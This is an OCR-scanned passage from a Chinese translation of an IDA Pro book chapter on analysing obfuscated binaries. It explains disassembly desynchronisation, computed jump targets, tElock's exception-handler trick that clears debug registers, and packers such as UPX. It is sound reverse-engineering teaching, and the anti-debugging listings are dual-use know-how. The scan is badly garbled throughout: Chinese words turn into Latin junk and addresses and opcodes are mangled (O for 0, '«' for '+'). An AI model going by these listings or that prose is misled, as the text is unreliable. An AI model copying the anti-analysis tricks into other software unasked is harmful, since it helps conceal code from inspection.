进入 二 进 制 分 析 领 域 的 门槛 。 虽然 这 并 不 完全 归功 于 IDA, 但 近 些 年 来 ， 二进制 道 向 工程 领域 
已 经 取得 了 长 足 的 进步 ， 而 希望 保护 软件 不 被 分 析 的 程序 员 也 同样 不 甘 示弱 。 于 是 ， 过 去 几 年 
中 ， 递 向 工程 人 员 与 希望 保护 他 们 代码 的 程序 员 之 间 展 开 了 某 种 “军备 竞赛 "。 在 这 一 章 中 ， 
我 们 将 分 析 IDA 在 其 中 扮演 的 角色 ， 并 讨论 人 们 为 保护 代码 而 采取 的 措施 ， 以 及 IDA 如 何 战 
胜 这 些 措施 。 

各 种 字典 定义 指出 ,模糊 是 一 种 使 某 物 变 得 模糊 、 混 乱 ， 令 人 困惑 、 迷 惑 ， 以 防止 他 人 理解 
被 模糊 的 项 目的 行为 。 另 一 方面 , 反 北向 工程 包括 一 系列 旨 在 阻止 他 人 分 析 某 个 项 目的 技巧 ( 模 
糊 为 其 中 之 一 )。 在 本 书 中 及 使 用 IDA 的 情形 下 ， 我 们 认为 这 些 反 逆向 工程 技巧 所 适用 的 项 目 为 
二 进 制 可 执行 文件 ( 例如 ， 相 对 于 源 文件 或 硅 芯 片 )。 

为 了 研究 模糊 以 及 反 逆 向 工程 对 于 IDA 应 用 的 总 体 影响 ， 我 们 首先 将 这 些 技巧 分 类 ， 以 了 
解 每 一 种 技巧 的 作用 。 需 要 注意 的 是 ， 对 每 一 种 技巧 进行 分 类 ， 并 没有 唯一 正确 的 方法 ， 因 为 
这 些 分 类 往往 会 相互 重 释 。 此 外 ， 新 的 反 逆向 工程 技巧 不 断 涌现 ， 我 们 在 这 里 不 可 能 讨论 所 有 
这 些 技术 。 


21.1. RERS NINII 


ESITATI 3:32 H BIE EATA R PD 1 PERPE AAE Sr B] HIR V 这 些 技巧 所 
针对 的 目标 恰恰 是 IDA ZW AE, URRE IDA 逆向 工程 二 进 制 文 件 ， 它 
们 应 引起 你 的 极 大 关注 。 下 面 介绍 几 种 反 藤 态 分 析 技 巧 。 


21.1.1 反 汇 编 去 同步 


这 是 一 种 较为 古老 的 技巧 , 它 专门 破坏 反 汇 编 过 程 ， 即 创造 性 地 使 用 指令 和 数据 ,以 阻止 反 
汇编 硕 找 到 一 条 或 多 条 指令 的 起 始 地 址 。 通 钟 ， 这 种 方法 将 令 反 汇编 釉 “ 迷 失 上 自己 ”， 无 法 生成 
反 汇 编 代 码 清单 ， 或 者 至 少 生成 错误 的 反 汇 编 代 码 清单 。 





















































21.1 AHADI 345 


在 下 面 的 代码 中 ，IDA 正 努 力 反 汇编 Shiva c3 ph] LELER: 


LOAD: 0A04BOD1 call € near ptr loc AO4BOD641 

LOAD : OA04BOD6 

LOAD:0AO4BOD6 loc AO4BOD6: ; CODE XREF: start+11Wp 
 L0AD:0AO4BOD6 mov dword ptr [eax-73h], OFFEBOA40h 

LOAD:0AO4BOD6 start endp 


LOAD : 0A04BOD6 
LOAD : 0A04BODD 


LOAD:0AOA4BODD loc AO4BODD: ` CODE XREF: LOAD:0A04B14Cv/j 

LOAD : OA04BODD loopne loc AO4BO6F 

LOAD : OA04BODF mov dword ptr [eax+56h] 5CDAB950h 
 LOAD:0AO4BOE6 iret 

LOAD :0AO4BOE6 ;--------------- 
© LOAD:0A04BOE7 db 47h 

LOAD : OA04BOE8 db 31h, OFFh, 66h 


LOAD :0AO4BOEB ;--------------------------------------------------------------- 
LOAD : 0A04B0EB 

LOAD : 0A04B0EB loc A04B0EB: ; CODE XREF: LOAD:0A04B098^^ j 
LOAD : OAO4BOEB mov edi, 0C7810D98h 


这 个 例子 执行 了 一 次 调用 o, 使 用 跳 转 会 更 加 方便 )， 调 用 对 和 象 在 现 有 指令 的 中 间 ( @ )。 
由 于 IDA 认为 这 个 函数 调用 将 会 返回 , 它 继续 反 汇 编 地 址 0A04B0D6 ( @ ) 处 的 指令 ( 并 不 正确 )。 
调用 指令 的 真正 目标 一 一 1oc A04B0D6+1(0A04B0D7) 一 一 将 不 会 被 反 汇编 ,因为 相关 字 节 已 经 作为 
0A04B0D6 处 的 S 字 节 指 邻 的 一 部 分 分 配 。 如 果 注 意 到 这 种 情况 , 剩 下 的 反 汇 编 代 码 清单 应 引起 我 
们 的 怀疑 。 其 他 证 据 包 括 出 人 意料 的 用 户 空间 指令 ( @， 这 里 为 iret”) 及 杂项 数据 类 型 ( @ )。 

注意 ,这 种 行为 并 不 仅 限 于 IDA; 无 论 它们 使 用 的 是 递归 下 降 算 法 还 是 线性 扫 摘 算法， 几乎 
所 有 有 反 汇 编 带 都 会 成 为 这 种 技巧 的 受害 者 。 

处 理 这 种 情况 的 正确 方法 是 对 包含 调用 目标 字 市 的 指令 取消 定义 ,然后 在 调用 目标 地 址 处 定 
义 一 条 指令 ， 以 重新 同步 反 汇 编 代 码 清单 。 当 然 ， 使 用 交互 式 反 汇编 硕 可 大 大 简化 这 个 过 程 。 使 
用 IDA， 将 光标 放 在 @ 处 ， 应 用 Edit » Undefine ( 热 键 U )， 然 后 将 光标 放 在 0A04B0D7 地 址 处 ， 
应 用 Edit » Code ( 热 键 C )， 可 以 得 到 下 面 的 代码 : 









































LOAD: 0A04BOD1 call loc AO4BOD7 
LOAD:0A04BOD1 ;--------------- 
€ L0AD:0A04BOD6 db OC7h ; | 


上 
LOAD : OA04BOD7 


LOAD:0A04BOD7 loc AO4BOD]: ; CODE XREF: start+11 个 p 
© LOAD:0A04BOD7 pop eax 
LOAD: 0A04BOD8 lea eax, [eax«oAh] 


LOAD: 0A04B0DB 


(D 2003 4E, Shaun Clowes 和 Neel Mehta 首次 在 CanSecWest 上 推出 Shiva, ZI: http://www.cansecwest.com/core03/ 


shiva.ppto 
(2) x86 iret 指令 用 于 从 一 个 中 断 处 理 例 程 返 回 。 中 断 处 理 例 程 最 常见 于 内 核 空 间 。 
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LOAD: OAO4BODB loc AO4BODB: ; CODE XREF: start:loc AO4BODB^j 
© LOAD:0A04BODB jmp short near ptr loc AO4BODB41 
LOAD:0AOA4BODB start endp 


LOAD: OA04BODB 
LD 
LOAD : OA04BODD db OEOh ; a 


从 这 个 代码 段 中 , 我 们 发 现 , 很 明显 , 地 址 0A0480D6 ( 9 ) 处 的 字 节 从 未 执行 。 地址 0^0480D7 
(8) (调用 目标 ) 的 指令 用 于 从 栈 上 删除 返回 地 址 (来 自 虚假 调用 )， 然 后 执行 继续 。 值 得 注意 
的 是 , 不 久之 后 , 我 们 这 里 讨论 的 反 逆 回 工 程 技巧 又 被 重新 利用 , 这 次 它 使 用 的 是 地 址 0A04B0DB 
(6) 处 的 一 个 2 字 节 跳 转 指令 ， 它 实际 上 跳 转 到 自身 之 中 。 这 时 ， 我 们 同样 必须 取消 一 条 指令 
的 定义 ， 以 到 达 下 一 条 指令 的 开始 位 置 。 再 一 次 应 用 取消 定义 (地 址 0A04B0DB 处 ) 和 重新 定义 
( 地址 0A04B0DC 处 ) 过 程 ， 得 到 下 面 的 反 汇 编 代 码 清单 : 











€ LOAD:0A04BOD7 pop eax 
 |0AD:0A04BOD8 lea eax, [eax«oAh] 
LOAD: 0AO4BOD8 ; -------------- 
LOAD : OA04BODB db OEBh ; d 
LOAD: GAGABODC (ce Hed d use 
€ LOAD:0A04BODC jmp eax 
LOAD :0A04B0DC start endp 


结果 ， 跳 转 指 令 的 目标 是 另 一 条 跳 转 指令 (@ ), 但 是 , KC mtk IT RERE H EE (分 
析 人 员 也 会 感到 困惑 )， 因 为 跳 转 的 目标 包含 在 寄存 希 (EAX) 中 ， 并 在 运行 时 计算 。 这 是 另 一 
种 类 型 的 反 静 态 分 析 技 巧 , 将 在 21.1.2 节 中 讨论 。 在 这 个 例子 中 ,鉴于 在 跳 转 之 前 的 指令 序列 相 
对 简单， 确定 EAX 寄存 右 包 含 的 值 并 不 是 非常 困难 。@ 处 的 pop 指令 将 前 一 个 例子 中 调用 指令 
( 0A04B0D6 ) 的 返回 地 址 加 载 到 EAX 寄存 带 中 ， 随 后 的 指令 (9) 再 给 EAX 加 上 105. D. SE 
转 指 令 的 目标 为 0A04B0E0， 我 们 必须 从 这 个 地 址 恢复 反 汇 编 过 程 。 

最 后 一 个 去 同步 的 例子 摘自 一 个 不 同 的 二 进 制 文件 , 它 说 明 如 何 使 用 处 理 器 标志 将 条 件 跳 转 
转换 成 绝对 跳 苇 。 下 面 的 反 汇 编 代 码 清单 说 明 如 何 使 用 x86 2 标志 实现 这 个 目的 : 




















€ .text:00401000 XOr eax, eax 
© .text:00401002 ]z short near ptr loc 40100941 
© .text:00401004 mov ebx, [eax] 
O .text:00401006 mov [ecx-4], ebx 
. text: 00401009 
.text:00401009 loc 401009: ; CODE XREF: .text:00401002 个 ] 
© .text:00401009 call near ptr OADFEFFC6h 
. text :0040100E ficom | word ptr [eax«59h] 








这 里 的 xor 指令 ( @ ) 用 于 清 零 EAX 寄存 器 和 设置 x86 2 标志 。 知 道 设置 2 标志 后 ， 程 序 员 
利用 一 个 始终 被 接受 的 “ 遇 零 路 转 ”( jz ) 指令 (Ce) 实现 无 条 件 跳 转 。 因 此 ， 跳 转 与 跳 转 目 标 
之 间 的 指令 上 日 和 @ 从 未 执行 ， 仅 起 到 迷惑 分 析 人 员 的 作用 。 值 得 注意 的 是 ， 这 个 例子 同样 通过 中 
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转 到 一 条 指令 中 间 ( @ )， 隐 藏 了 真实 的 跳 转 目标 。 正 确 反 汇 编 后 的 代码 如 下 所 示 : 


. text : 00401000 xor eax, eax 

. text :00401002 jz short loc 40100A 

. text : 00401004 mov ebx, [eax] 

. text :00401006 mov [ecx-4], ebx 

.text:00401006 ; ------------------ 
@ .text:00401009 db OE8h ; F 

.text:0040100A ; ---------------- 

. text :0040100A 

.text:0040100A loc 40100A: ; CODE XREF: .text:00401002^^ j 
© .text:0040100A mov eax, ODEADBEEFh 

. text :0040100F push eax 

. text :00401010 pop ecx 














由 于 和 额外 的 子 市 ( @ ) ei" huit. BERHBERGCHES (0) 已 经 显露 出 来 。 当 然 ， 在 
执行 条 件 跳 转 之 前 ， 你 可 以 使 用 更 加 迁 回 的 方式 设置 和 检查 标志 。 在 检查 CPU 标志 位 的 值 之 前 ， 
影响 标志 位 的 操作 数量 越 多 ,分析 这 类 代码 的 困难 程度 就 越 大 。 


21.1.2 ”动态 计算 目标 地 址 


请 不 要 将 本 节 的 标题 与 反动 态 分 析 技巧 混淆 。 这 里 的 “动态 计算 ” 指 接 下 来 的 执行 地 址 在 运 
行 时 计算 得 出 。 在 本 节 中 , 我们 讨论 几 种 获取 这 种 地 址 的 方法 。 这 类 技巧 的 目的 是 隐藏 (模糊 ) 
一 个 二 进 制 文件 的 真实 控制 流 路 径 ， 以 阻止 他 人 进行 静态 分 析 。 

上 一 节 中 有 一 个 应 用 这 种 技巧 的 例子 。 这 个 例子 使 用 一 个 call 语句 将 一 个 返回 地 址 压 入 栈 
H, 然后， 这 个 返回 地 址 直接 由 栈 进 入 寄存 器 ， 青 给 寄存 器 加 上 一 个 常量 值 ， 得 到 最 后 的 目标 地 
hk. 最终， 通过 执行 一 个 跳 转 指令 ， 跳 转 到 寄存 器 内 容 指 定 的 位 置 ， 青 到 达 目 标 地 址 。 

我 们 可 以 开发 无 数 类 似 的 代码 序列 ,获得 一 个 目标 地 址 ,并 将 控制 权 转交 给 这 个 地 址 。 下 面 
的 代码 将 最 初 的 启动 顺序 包装 在 Shiva 中 ， 提 供 了 另 一 种 动态 计算 目标 地 址 的 方法 : 


























LOAD: 0A04B3BE mov ecx, 7F131760h ; ecx = 7F131760 
LOAD : 0A04B3C3 Xor edi, edi ; edi = 00000000 
LOAD: 0A04B3C5 mov di, 1156h ; edi = 00001156 
LOAD : 0A04B3C9 add edi, 133ACOOOh ; edi = 133AD156 
LOAD: 0A04B3CF xor ecx, edi ; ecx = 6C29C636 
LOAD :0A04B3D1 sub ecx, 622545CEh ; ecx = 0A048068 
LOAD : 0A04B3D7 mov edi, ecx ; edi = 0A048068 
LOAD : 0A04B3D9 pop eax 
LOAD : 0A04B3DA pop esi 
LOAD : 0A04B3DB pop ebx 
LOAD : 0A04B3DC pop edx 
LOAD : 0A04B3DD pop ecx 

€ L0OAD:0A04B3DE xchg edi, [esp] TOS = 0A048068 


e we 


LOAD:0A04B3E1 return to 0A048068 


m 
(D 
cr 
2 

i 
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右边 的 注释 记录 了 每 一 条 指令 对 各 种 CPU 寄存 顺 所 做 的 更 改 。 这 个 过 程 以 一 个 获取 到 的 值 
被 移入 栈 顶 部 (TOS) 而 告终 ( @ )， 从 而 使 返回 指令 将 控制 权 转 交 给 计算 得 出 的 位 置 (这 里 为 
0A04B068 ) 这 样 的 代码 序列 能 够 显著 增加 毅 态 分 析 的 工作 量 ， 因 为 分 析 人 员 必 须 动 手 运行 代码 ， 
才能 确定 程序 的 具体 控制 流 路 径 。 

近 些 年 来 ,我 们 已 经 开发 并 利用 更 加 复杂 的 控制 流 隐 闫 技 巧 。 在 最 复杂 的 情形 中 ,一 个 程序 
将 使 用 多 个 线程 或 子 进程 计算 控制 流 信 息 ， 并 通过 某 种 形式 的 进程 间 通 信 ( 对 于 子 进程 ) 或 线程 
同步 ( 对 于 多 线程 ) 接收 这 些 信息 。 在 这 类 情况 下 ， 进 行 静 态 分 析 将 会 非常 困难 ， 因 为 你 不 仅 需 
要 理解 多 个 可 执行 实体 的 行为 ， 而 且 需 要 了 解 这 些 实体 交换 信息 的 方式 。 例如 ,一 个 线程 在 一 个 
共享 的 semaphore "对象 上 等 待 ， 而 第 二 个 线程 则 计算 值 或 修改 代码 ， 一 旦 第 二 个 线程 通过 




















semaphore 发 出 操作 完成 的 信号 ， 第 一 个 线程 将 利用 第 二 个 线程 的 操作 结果 。 
另 一 种 技巧 常用 在 面向 Windows 的 恶意 软件 中 ， 它 配置 一 个 异常 处 理 程序 ， 并 有 意 触发 一 














个 弄 毅 ,然后 在 处 理 异 关 时 操纵 进程 的 寄存 融 的 状态 。 下 面 的 例子 被 tElock 反 逆向 工程 工具 用 于 
隐藏 程序 的 真实 控制 流 : 
€ .shrink:0041D07A call $45 
@ .shrink:0041DO7F pop ebp 
© .shrink:0041D080 lea eax, [ebpr46h] ; eax holds 0041DO7F + 46h 
.Shrink:0041D081 inc ebp 
@ .shrink:0041D083 push eax 
. shrink:0041D084 Xor eax, eax 
© .shrink:0041D086 push dword ptr fs:[eax] 
Q .shrink:0041D089 mov fs:[eax], esp 
@ .shrink:0041D08C int 3 ; Trap to Debugger 
.Shrink:0041D08D nop 
.Shrink:0041DO8E mov eax, eax 
. Shrink:0041D090 stc 
.sShrink:0041D091 nop 
. shrink:0041D092 lea eax, ds:1234h[ebx*2] 
. Shrink:0041D099 clc 
.Shrink:0041D09A nop 
. Shrink:0041D09B shr ebx, 5 
. Shrink:0041DO9E cld 
. Shrink:0041DO9F nop 
. Shrink :0041D0A0 rol eax, 7 
. sShrink:0041D0A3 nop 
. shrink:0041D0A4 nop 
© .shrink:0041D0A5 xor ebx, ebx 
© .shrink:0041D0A7 div ebx ; Divide by zero 
.Shrink:0041D0A9 pop dword ptr fs:0 


D 可 以 把 一 个 semaphore 看 成 是 








个 令 牌 ， 在 进入 一 个 房间 执行 某 种 操作 之 前 ， 你 必须 拥有 这 个 令 牌 。 如 有 打 你 拥有 





这 个 令 牌 ， 其 他 人 将 不 能 进入 房间 。 当 你 在 房间 中 完成 任务 后 ， 你 可 以 离开 ， 并 将 令 牌 交 给 其 他 人 ， 然 后 ， 这 个 
人 将 进入 房间 ， 并 利用 你 刚刚 完成 的 工作 〈 你 并 不 知道 这 一 点 ， 因 为 你 这 时 并 不 在 房间 内 )。semaphore 常用 于 对 
程序 的 代码 或 数据 实施 互 斥 锁 。 
(25 AX Windows 结构 化 异常 处 理 ( SEH ) 的 更 多 信息 ， 参 见 http://www.microsoft.com/msj/0197/exception/exception.aspXx。 
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首先 ， 这 段 代 码 使 用 一 个 调用 指令 C09) 调用 下 一 条 指令 ( @ )， 这 个 调用 指令 将 0041007F 
作为 返回 地 址 压 入 栈 中 ， 随 后 这 个 返回 地 址 立即 由 栈 进 入 EBP Afrit (9). 接 下 来 (69), EAX 
寄存 器 被 设置 为 EBP 和 46h 的 和 ， 即 0041D0C5， 并 将 这 个 地 址 作为 一 个 异常 处 理 函 数 的 地 址 压 
人 栈 中 ( @ )。 剩 下 的 异常 处 理 程序 设置 在 @ 和 @ 处 发 生 ， 它 们 将 新 的 异常 处 理 程序 链接 到 由 
fs:[0]2 引 用 的 现 有 异常 处 理 程序 链 中 。 下 一 步 是 有 意 生 成 一 个 异常 (@ )， 这 里 为 int 3， 它 是 
调试 需 使 用 的 一 个 软件 陷阱 (中断 ) 在 x86 程序 中 ,int 3 指令 被 调试 融 用 于 实现 一 个 软件 断 点 。 
正常 情况 下 ,这 时 一 个 依附 于 进程 的 调试 需 将 获得 控制 权 。 实 际 上 ， 如 果 一 个 调试 需 已 经 依附 于 
进程 ， 它 将 有 机 会 第 一 个 处 理 异 党 (把 它 看 成 是 一 个 断 点 )。 在 这 个 例子 中 ， 程 序 已 做 好 处 理 异 
Sé DIE, D. 任何 依附 的 调试 需 应 将 异 向 递交 给 程序 处 理 。 无 法 使 程序 处 理 异 各 可 能 会 导致 
错误 操作 ， 甚 至 会 使 程序 前 溃 。 如 果 不 了 解 如 何 处 理 int 3 异常 ， 你 将 无 法 知道 这 个 程序 下 一 步 将 
如 何 执行 。 如 果 我 们 假定 程序 会 在 int 3 后 继续 执行 ， 那 么 最 终 指令 @@ 和 @ 将 触发 一 个 “ 除 以 零 ” 
SN. 


与 前 面 的 代码 有 关 的 异常 处 理 程序 从 地 址 0041D0C5 开始 。 这 个 函数 的 第 一 部 分 如 下 所 示 : 

















.shrink:0041DOC5 sub 41DOC5 proc near ; DATA XREF: .stack:0012FF9C 个 o 
. Shrink:0041DOC5 

.Shrink:0041DOC5 pEXCEPTION RECORD = dword ptr 4 

.shrink:0041DOC5 arg 4 dword ptr 8 


€ .shrink:0041DOC5 pCONTEXT dword ptr oCh 
.Shrink:0041DOC5 
© .shrink:0041DOC5 mov eax, [esp+pEXCEPTION RECORD] 
@ .shrink:0041DOC9 mov ecx, [esp+pCONTEXT] ; Address of SEH CONTEXT 
© .shrink:0041DOCD inc [ecx+CONTEXT. Eip]  ; Modify saved eip 
© .shrink:0041DO0D3 mov eax, [eax] ; Obtain exception type 
© .shrink:0041DOD5 cmp eax, EXCEPTION INT DIVIDE BY ZERO 
. Shrink :0041D0DA jnz short loc_41D100 
.Shrink:0041DODC inc [ecx+CONTEXT. Eip]  ; Modify eip again 
@ .shrink:0041DOE2 Xor eax, eax ; Zero x86 debug registers 
. Shrink :0041D0E4 and [ecx+CONTEXT.Dro], eax 
. Shrink :0041D0E7 and [ecx+CONTEXT.Dr1], eax 
.shrink:0041DOEA and [ecx«CONTEXT.Dr2], eax 
.shrink:0041DOED and [ecx«CONTEXT.Dr3], eax 
.Shrink:0041DOFO and [ecx«CONTEXT.Dr6], OFFFFOFFOh 
.shrink:0041DO0F7 and [ecx«CONTEXT.Dr7], oDCooh 
.Shrink:0041DOFE jmp short locret 41D160 





传递 给 异常 处 理 孔 数 的 第 三 个 参数 ( @ ) 是 一 个 指 回 一 个 Windows CONTEXT 结构 体 (在 
Windows API 头 文件 winnt.h 中 定义 ) 的 指针 。CONTEXT 结构 体 使 用 异常 发 生 时 所 有 CPU 寄存 器 
的 内 容 进 行 初始 化 。 一 个 异常 处 理 程序 有 机 会 检查 和 修改 (如 有 必要 ) CONTEXT. 结构 体 的 内 容 。 
如 果 异 常 处 理 程序 认为 它 已 经 更 正 了 导致 异常 的 问题 , 它 可 以 通知 操作 系统 ， 人 允许 导致 异常 的 线 








(D Windows 配置 FS 寄存 带 指 癌 当 前 线程 环境 块 (TEB ) 的 基 址 。TEB 中 的 第 一 项 ( 偏 移 量 为 0 ) 是 一 个 指向 异常 处 
理 函 数 的 指针 链接 表 中 的 第 一 个 指针 ， 如 果 程 序 中 出 现 异常 ， 即 调用 上 面 的 异常 处 理 函 数 。 
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程 继续 执行 。 这 时 ， 操 作 系 统 会 从 提供 给 异常 处 理 程序 的 CONTEXT 结构 体 中 ， 为 这 个 线程 重新 加 
载 CPU 寄存 带 ， 线 程 将 恢复 执行 ， 就 好 像 什么 也 没有 发 生 一 样 。 

在 上 面 的 例子 中 , 异常 处 理 程序 首先 访问 线程 的 CONTEXT 结构 体 ( @ ), 以 递增 指令 指针 ( @ ), 
从 而 移动 到 生成 异常 的 指令 之 外 。 接 下 来 , 异常 的 类 型 代码 | EXCEPTION RECORD@ 中 的 一 个 字段 ] 
被 检索 ( @ )， 以 确定 异常 的 性 质 。 这 部 分 的 异常 处 理 程序 通过 将 所 有 x86 硬件 调试 寄存 器 "请 零 
(@ )， 处 理 前 一 个 例子 中 后 成 的 “ 除 以 零 ” 错 误 (0 @ )。 如 果 不 分 析 剩 余 的 tElock 代码 ， 你 不 能 
立即 了 解 清 零 调试 寄存 右 的 原因 。 在 这 个 例子 中 ，tElock 正清 除 前 一 个 操作 的 值 ， 在 前 一 个 操作 
中 ， 它 使 用 调试 寄存 善 设置 了 4 个 断 点 以 及 我 们 前 面 看 到 的 int 3。 除 了 模糊 程序 的 真正 控制 流 
外 ， 清 除 或 修改 x86 调试 寄存 大 可 能 会 对 应 用 软件 调试 硕 〈 如 OllyDbg ) 或 IDA 的 内 部 调试 硕 造 
成 重大 影响 。 这 类 反 调试 技巧 将 在 21.2 节 中 讨论 。 

操作 码 模糊 

到 目前 为 止 ， 我 们 讨论 的 技巧 可 以 形成 (实际 上 ， 旨 在 形成 ) 一 种 障碍 ， 以 防止 他 人 了 解 程 
序 的 控制 流 。 但 是 , 还 没有 一 种 技巧 能 够 阻止 你 查看 你 所 分 析 的 程序 的 正确 反 汇编 代码 清单 。 去 
同步 会 在 很 大 程度 上 影响 反 汇 编 代码 清单 , 但 是 ,通过 重新 格式 化 反 汇 编 代 码 清单 ,使 其 反映 正 
确 的 指令 流 ， 你 就 可 以 轻易 破坏 这 种 技巧 。 

阻止 正确 反 汇 编 的 一 种 更 加 有 效 的 方法 是 在 创建 可 执行 文件 时 编码 或 加 密 具 体 的 指令 。 
模糊 指令 对 CPU 没有 用 人 处， 在 被 CPU 提取 并 执行 之 前 ， 它 们 必须 经 过 去 模糊 处 理 ， 以 恢复 
到 原始 状态 。 因 此 ,程序 必须 至 少 有 一 个 部 分 没有 被 加 密 ， 以 充当 启动 例 程 。 在 模糊 程序 中 , 
启动 例 程 通常 负 员 对 一 些 或 所 有 的 璋 余 程序 进行 去 模糊 处 理 。 模 糊 过 程 的 一 般 概 况 如 图 21-1 
所 示 。 





































， 修改 后 的 
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MAC i | 8. (24 —Rin 
数据 C 模糊 数据 
转换 为 原 入 口 点 去 模糊 存根 


( OEP ) 


图 21-1 RE 
如 图 21-1 所 示 ， 模 糊 过 程 的 输入 是 用 户 出 于 茶 种 原因 而 望 进行 模糊 的 程序 。 许 多 时 候 ， 输 
入 的 程序 使 用 标准 编程 语言 和 构建 工具 (编辑 融 、 编 详 带 等 ) 编写 ,并且 很 少 考虑 到 将 要 进行 模 
糊 处 理 。 生成 的 可 执行 文件 被 输入 到 一 个 模糊 实用 工具 中 , 后 者 将 原始 程序 转换 成 一 个 功能 相同 
但 经 过 模糊 的 二 进 制 文件 。 模糊 实用 工具 负 员 模糊 原始 程序 的 代码 和 数据 市 ， 并 增加 为 一 段 代码 
(一 个 去 模糊 存根 )， 在 运行 时 访问 原始 功能 之 前 ， 这 个 存根 负责 对 代码 和 数据 进行 去 模糊 处 理 。 


























(D 在 x86 P, WIRATA 0~7 (Dro ~ Dr7) 用 于 控制 硬件 辅助 断 点 的 使 用 。Dr0 ~ Dr3 用 于 指定 断 点 地 址 ， 而 Dr6 
和 Dr7 则 用 于 启用 和 禁用 特定 的 硬件 断 点 。 
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模糊 实用 工具 还 修改 程序 的 头 部 , 将 程序 的 入 口 点 重 定向 到 去 模糊 存根 ， 确 保 从 去 模糊 过 程 开 始 
执行 。 在 去 模糊 后 ， 执 行 通常 会 进入 原始 程序 的 入 口 点 ， 这 时 ,程序 将 开始 执行 ， 就 好 像 它 根本 
没有 被 模糊 处 理 一 样 。 

用 于 创建 模糊 二 进 制 文件 的 模糊 实用 工具 不 同 , 这 个 过 于 简化 的 模糊 过 程 也 明显 不 同 。 可 用 
于 处 理 模 糊 过 程 的 实用 工具 日 益 增 多 。 这 类 实用 工具 提供 的 功能 包括 : 压缩 、 反 - 反 汇 编 和 反 调 
试 技巧 。 相关 程 序 包括 : UPX? C 压缩 器 ,也 用 于 ELF )、ASPack”( 压缩 器 )、ASProtect ( ASPack 
的 制造 者 开发 的 反 逆向 工程 工具 )、 用 于 Windows PE 文件 的 tlock2 (压缩 和 反 逆 向 工程 工具 )、 
用 于 Linux ELE 二 进 制 文件 的 Burneye^ (HMR ) 和 Shiva”( 加 密 和 反 调试 )。 模 糊 实 用 工具 的 功 
能 已 经 取得 很 大 的 进步 ， 一 些 反 逆向 工程 工具 ， 如 WinLicense"， 能 够 为 整个 构建 过 程 提 供 更 紧 
密 的 集成 ， 人 允许 程序 员 在 构建 过 程 的 每 一 个 步骤 (从 源 代码 到 已 编译 二 进 制 文件 的 后 处 理 阶段 ) 
集成 反 逆 癌 工 程 功能 。 

檬 糊 程序 领域 的 最 近 发 展 涉 及 使 用 虚拟 机 执行 引 苟 来 包 沪 原始 可 执行 文件 。 根 据 虚 拟 化 
模糊 需 的 复杂 程度 ， 原 始 的 机 需 代 码 可 能 永远 不 会 直接 执行 ， 而 是 由 面 回 字 节 人 码 的 虚拟 机 来 
解释 。 非 常 复 杂 的 虚拟 化 模糊 需 能 够 在 每 次 运行 时 生成 唯一 的 虚拟 机 实例 ， 因 而 很 难 创建 多 
功能 的 去 模糊 算法 来 破解 它们 。VMProtect 就 是 一 个 虚拟 化 模糊 器 。VMProtect 用 于 模糊 处 理 
Clampi?^7k 5, 

和 任何 侵犯 性 技术 一 样 , 人 们 也 已 经 开发 出 一 些 防 范 措 施 来 对 抗 许 多 反 逆 癌 工 程 工具 。 多 数 
情况 下 ， 这 类 工具 的 目的 是 找到 原始 的 、 不 受 保护 的 可 执行 文件 〈 或 者 一 个 合适 的 草本 )， 然 后 
使 用 反 汇 编 器 和 调试 需 等 更 加 传统 的 工具 对 它 进 行 分 析 。 有 一 个 专用 于 对 Windows 可 执行 文件 
进行 去 模糊 处 理 的 工具 ,叫做 QuickUnpack”。 和 其 他 许多 自动 化 的 解压 程序 一 样 ，QuickUnpack 
以 调试 带 的 方式 运行 ， 并 允许 一 个 模糊 的 二 进 制 文件 执行 ， 下 到 它 的 去 模糊 阶段 , 然后 从 内 存 捕 
获 进程 映像 。 需 要 小 心 的 是 , 这 类 工具 可 用 于 运行 潜在 的 恶意 程序 , 希望 在 这 些 程 序 解 压 或 去 模 
糊 后 ， 但 又 在 它们 有 机 会 执行 任何 恶意 行为 之 前 ,阻止 这 些 程序 执行 。 因 此 ， 你 应 该 始终 在 类 似 
沙 盒 的 环境 中 执行 这 样 的 程序 。 

使 用 一 个 纯粹 的 静态 分 析 环 境 分 析 模 糊 代 码 是 一 个 充满 挑战 的 任务 。 由 于 不 能 执行 去 模糊 存 
根 ， 在 开始 反 汇 编 模糊 代码 之 前 ， 必 须 采 取 某 种 方法 解压 或 解密 二 进 制 文件 被 模糊 处 理 的 部 分 。 
一 个 已 经 使 用 UPX 压缩 程序 打包 的 可 执行 文件 的 布局 如 图 21-2 所 示 。 在 这 个 文件 的 地 址 空间 中 ， 
IDA 唯一 能 够 识别 的 部 分 是 @ 处 的 罕 条 ， 它 恰巧 是 UPX 解压 缩 存 根 。 



























































(D 参见 http://upx.sourceforge.net/。 

(2) 参见 http://www.aspack.com/。 

(3) 参见 http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/Telock.shtml., 

(4) 参见 http://packetstormsecurity.org/groups/teso/indexdate.html., 

© 参见 http://cansecwest.com/core03/shiva.ppt ( 工具 : http://www.securiteam.com/tools/5XP04 1FAOU.html )。 

© 参见 http://www.oreans.com/winlicense. php. 

CD 参见 http://www.vmpsoft.com/; 

参见 http://www.symantec.com/connect/blogs/inside-jaws-trojanclampi ; 

(9) 参见 http://qunpack.ahteam.org/wp2/ ( 俄罗斯 ) 或 http://www.woodmann.comr/collaborative/tools/index.php/Quick Unpack. 
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| Navigator Scale: 1 pixel 2 64 bytes; Range: 00402000-00409000 Library function Data 
4 i > Regular function Unexplored 
b d ES instruction External symbol 
Additional display: | -] 
SE e o 


图 21-2 ”一 个 使 用 UPX 打包 的 二 进 制 文件 的 IDA. 导航 带 

分 析 地 址 空间 的 内 容 , 可 以 发 现 @@ 左 边 的 空白 空间 , 以 及 @ 和 @ 之 间 区 域内 明显 的 随机 数据 。 
这 些 随 机 数据 是 UPX 压缩 过 程 的 结 末 。 解 压缩 存 根 的 作用 是 在 最 后 将 控制 权 转 交 给 解压 代码 之 
前 ， 将 随机 数据 解压 到 导航 审 左 边 的 空 晶 区域 。 注 意 ， 导 航 栏 的 这 种 少见 的 外 观 是 一 种 洲 在 的 蜡 
示 ， 说 明 这 个 二 进 制 文件 已 经 以 某 种 形式 被 模糊 处 理 。 实 际 上 ， 使 用 IDA 查看 已 被 模糊 处 理 的 
二 进 制 文件 时 , 通 稼 你 会 得 到 许多 上 暗示。 说 明 二 进 制 文件 被 模糊 处 理 的 一 些 可 能 的 暗示 如 下 所 示 。 

OQ 很 少 有 代码 在 导航 市 中 突出 显示 。 

O "Functions" ( 函数 ) 窗口 中 列 出 的 函数 韭 第 少 ， 通 常 仅 显 示 start RÉI. 

O “Imports” (FA ) 窗口 中 列 出 的 导入 函数 非常 少 。 

